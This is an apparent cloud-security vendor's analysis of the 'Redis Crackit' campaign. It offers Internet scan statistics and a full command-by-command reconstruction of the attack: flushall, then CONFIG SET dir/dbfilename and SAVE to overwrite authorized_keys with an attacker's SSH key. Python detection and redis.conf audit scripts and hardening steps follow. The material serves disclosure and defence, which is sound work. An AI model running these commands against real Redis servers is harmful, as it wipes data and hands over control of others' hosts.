Redis Crackit Security Event Analysis

Event Description
On the morning of November 9, at around 10:00, NiuDun Cloud Security received several alarms from its customer server security monitoring system reporting that the SSH public key files on a number of systems had been tampered with, and began incident analysis. During the analysis we found traces of an attacker group exploiting a design weakness of Redis. Because the technique is simple but the impact is severe, we analysed the incident further and found it to be an Internet-wide intrusion campaign. If the Redis instance on your Linux server has no password set, it has very likely been affected: the result is that all Redis data is wiped and the server's SSH authorized_keys file is replaced with the attacker's public key.
For this incident we scanned the whole public Internet for Redis servers on port 6379, with the following results:
A total of 63,443 IPs expose Redis on port 6379 to the public Internet. Of these, 43,024 (about 67%) require no password authentication. 35,024 servers show signs of the Redis Crackit attack: about 55% of all exposed Redis instances, and about 81% of those with no password authentication.
Cause of Event
Many users download Redis and run it on the server as-is: no ACL, no password, running as root, and bound to 0.0.0.0:6379, so it is exposed to the public Internet. With unauthenticated access to Redis, an attacker can use Redis's own mechanisms (CONFIG SET dir, CONFIG SET dbfilename and SAVE) to write an SSH public key, or any other malicious file, onto the target server, and so gain direct control of it.
Reconstruction of the Attack Process
Find a Redis service with no authentication (the server answers a command without AUTH):
$ telnet 192.168.1.11 6379
Trying 192.168.1.11...
Connected to 192.168.1.11.
Escape character is '^]'.
echo "hey,noauth!"
$11
hey,noauth!
quit
+OK
Connection closed by foreign host.
Generate an SSH key pair (the public key is what will be planted on the victim):
$ ssh-keygen -t rsa -C "[email protected]"
Generating public/private rsa key pair.
Enter file in which to save the key (/home/antirez/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
f0:a1:52:e9:0d:5f:e4:d9:35:33:73:43:b4:c8:b9:[email protected]
The key's randomart image is:
+--[ RSA 2048]----+
|       . o+.     |
|      . o O..O*o |
|       = . + .+ .|
|        o B o.   |
|       . o S E.  |
|        . o      |
|                 |
|                 |
|                 |
+-----------------+
Write the public key into foo.txt, padded with blank lines on both sides. The RDB file that Redis will write contains binary data before and after the value, so the padding keeps the key on a line of its own, which is all sshd needs to accept it:
(echo -e "\n"; cat id_rsa.pub; echo -e "\n") > foo.txt
Wipe the database (so the dump contains nothing but the key; this is why victims lose their Redis data) and store the padded public key under a key named crackit:
$ redis-cli -h 192.168.1.11 flushall
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
Point the dump directory and file name at the system user's authorized_keys file and force a save, which overwrites the original file with the RDB dump containing the attacker's key:
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
192.168.1.11:6379> save
OK
Log in to the server over SSH with the matching private key:
$ ssh -i id_rsa antirez@192.168.1.11
Enter passphrase for key 'id_rsa':
Last login: Mon Nov 2 15:58:43 from 192.168.1.10
$ hostname
Salvatores-MacBook-Air.local
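Why the overwritten file still works as an authorized_keys file, and how a responder can check a host for this pattern, as an added example in Python (this is not code from the article and not part of Redis). It does three things: speaks the inline Redis protocol the telnet session above uses and reports whether the server answers without AUTH; rebuilds, from the RDB version 6 layout, the file that `SET crackit <padded key>` followed by `SAVE` leaves on disk; and inspects an authorized_keys file the way sshd reads it, flagging files that are really Redis dumps. The socket is replaced by a constructed FakeSocket, the public key is a constructed string, and the `crackit` key name and the 192.168.1.11 target are taken from the walkthrough; no bytes here come from a real victim.

```python
#!/usr/bin/env python3
"""Added example, not from the original article: checks for the Crackit pattern.

probe_redis_auth()        inline PING; 'open' means the server has no requirepass.
crackit_dump()            the RDB 6 file that SET crackit + SAVE writes (reconstructed).
inspect_authorized_keys() which lines sshd would still accept, and whether the
                          file was written by Redis rather than by an administrator.
The FakeSocket and SAMPLE_PUBKEY below are constructed so the script runs offline."""
import re
import socket

RDB_MAGIC = b"REDIS"      # every RDB dump starts with b"REDIS" + a 4-digit version
SSH_KEY_RE = re.compile(rb"^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp\d+) [A-Za-z0-9+/=]+")

# Constructed, not a real key: the base64 blob is filler of the right shape.
SAMPLE_PUBKEY = (b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDconstructedNotARealKeyBlob"
                 b"0123456789abcdefghijklmnopqrstuvwxyz+/= attacker@example")


def probe_redis_auth(sock):
    """Send an inline PING (same framing as typing into telnet) and classify the reply."""
    sock.sendall(b"PING\r\n")
    reply = sock.recv(4096)
    if reply.startswith(b"+PONG"):
        return "open"             # no requirepass: any client can issue CONFIG/SAVE
    if reply.startswith(b"-NOAUTH"):
        return "auth_required"    # requirepass is set; AUTH must come first
    return "unknown"


def probe_host(host, port=6379, timeout=3.0):
    """Network version of the probe; not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return probe_redis_auth(s)


class FakeSocket:
    """Stand-in for a TCP socket that replays one canned server reply."""
    def __init__(self, reply):
        self.reply, self.sent = reply, b""

    def sendall(self, data):
        self.sent += data

    def recv(self, n):
        return self.reply[:n]


def rdb_len(n):
    """RDB length prefix for n < 16384: one byte below 64, else two bytes with a 0b01 prefix."""
    return bytes([n]) if n < 64 else bytes([0x40 | (n >> 8), n & 0xFF])


def crackit_dump(pubkey):
    """RDB 6 file holding one string key 'crackit' whose value is the padded public key.
    Layout: magic+version, SELECTDB 0, type 0 (string), key, value, EOF, 8-byte checksum.
    The checksum is left as zeros, which Redis treats as 'checksum not present'."""
    value = b"\n\n" + pubkey + b"\n\n"        # the blank-line padding from foo.txt
    key = b"crackit"
    return (RDB_MAGIC + b"0006" + b"\xfe\x00" + b"\x00"
            + rdb_len(len(key)) + key + rdb_len(len(value)) + value
            + b"\xff" + b"\x00" * 8)


def inspect_authorized_keys(data):
    """Return (tampered, accepted_keys).

    sshd skips lines it cannot parse as a key, so the RDB bytes before and after
    the injected key do not stop it from working; that is why the attacker pads
    the key with blank lines. A file starting with the RDB magic, or carrying the
    'crackit' key name, was written by Redis, not by an administrator."""
    lines = [ln.strip() for ln in data.splitlines()]
    keys = [ln for ln in lines if SSH_KEY_RE.match(ln)]
    tampered = data.startswith(RDB_MAGIC) or b"crackit" in data
    return tampered, keys


if __name__ == "__main__":
    print("unauthenticated server:", probe_redis_auth(FakeSocket(b"+PONG\r\n")))
    print("password-protected server:",
          probe_redis_auth(FakeSocket(b"-NOAUTH Authentication required.\r\n")))
    tampered, keys = inspect_authorized_keys(crackit_dump(SAMPLE_PUBKEY))
    print("RDB-written authorized_keys:", tampered, "- keys sshd would accept:", len(keys))
```

On a live host the same `inspect_authorized_keys` check can be run over the bytes of every `~/.ssh/authorized_keys` on the machine; a hit on the RDB magic is a reliable indicator of this attack, while the usable key list tells you which attacker key to remove.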
Patching and Hardening Recommendations
1. Network exposure:
If Redis does not need to be reached from outside the host, bind it to the loopback address only (bind 127.0.0.1 in redis.conf).
If external access is required, restrict which sources may reach port 6379 with network ACLs or firewall rules.
Tools such as stunnel can be used to encrypt the connection in transit.
2. Set a password for Redis (requirepass in redis.conf). Make it long: AUTH is very cheap for the server, so a short password can be brute-forced quickly.
3. Run Redis under a dedicated unprivileged system account with a nologin shell, not as root, so that even a successful file write cannot reach root's home directory or system files.
4. Disable dangerous commands, in particular CONFIG, by renaming them to the empty string in redis.conf:
rename-command CONFIG ""
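To check an existing redis.conf against items 1, 2 and 4 above, here is an added example in Python (not from the article or from the Redis project). WEAK_CONF and HARDENED_CONF are constructed for illustration, the password value is a placeholder, and the finding codes are names chosen here. Item 3 (a dedicated nologin account) is a system setting rather than a redis.conf directive, so it is outside this check.

```python
#!/usr/bin/env python3
"""Added example, not from the article: audit a redis.conf for the hardening items
above. The configs are constructed; the requirepass value is a placeholder."""
import shlex

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
WILDCARD = {"0.0.0.0", "*", "::"}

WEAK_CONF = """\
# Stock file run as-is: reachable from anywhere, no password, CONFIG usable.
bind 0.0.0.0
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
# Loopback only, password required, CONFIG and FLUSHALL disabled.
bind 127.0.0.1
port 6379
dir /var/lib/redis
requirepass CHANGE-ME-to-a-long-random-string-of-32-or-more-characters
rename-command CONFIG ""
rename-command FLUSHALL ""
"""


def parse_conf(text):
    """redis.conf rules: blank lines and lines starting with '#' are skipped; every
    other line is directive + arguments with shell-style quoting, so '""' is an
    empty argument. Directive names are case-insensitive."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def audit(text):
    """Return finding codes in check order: network exposure, requirepass, CONFIG."""
    conf = parse_conf(text)
    findings = []

    # Item 1: with no bind line Redis listens on every interface.
    binds = [a for d, args in conf if d == "bind" for a in args]
    if not binds or any(a in WILDCARD for a in binds):
        findings.append("bind-all-interfaces")
    elif any(a not in LOOPBACK for a in binds):
        findings.append("bind-non-loopback")      # acceptable only behind an ACL/firewall

    # Item 2: the last requirepass directive wins; AUTH is cheap, so short is weak.
    passwords = [args for d, args in conf if d == "requirepass" and args]
    if not passwords:
        findings.append("no-requirepass")
    elif len(passwords[-1][0]) < 32:
        findings.append("weak-requirepass")

    # Item 4: CONFIG must be renamed to "" so CONFIG SET dir/dbfilename is unavailable.
    renamed = {args[0].upper(): args[1] for d, args in conf
               if d == "rename-command" and len(args) == 2}
    if renamed.get("CONFIG") != "":
        findings.append("config-command-enabled")
    return findings


if __name__ == "__main__":
    print("weak config:    ", audit(WEAK_CONF))
    print("hardened config:", audit(HARDENED_CONF))
```

Run it against `/etc/redis/redis.conf` (or wherever the instance reads its config) by passing the file's text to `audit()`; an empty list means items 1, 2 and 4 are in place, and `bind-non-loopback` is the case where the ACL in item 1 must exist.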
Finally, we urge you to check your servers and fix this exposure as soon as possible. For any questions, contact NiuDun Cloud Security technical support (Enterprise QQ 800109969); NiuDun Cloud Security will keep guarding your site at the front line of security. CloudXNS users need not worry either: as long as your account is logged in on the NiuDun Cloud Acceleration website, you will receive the corresponding services.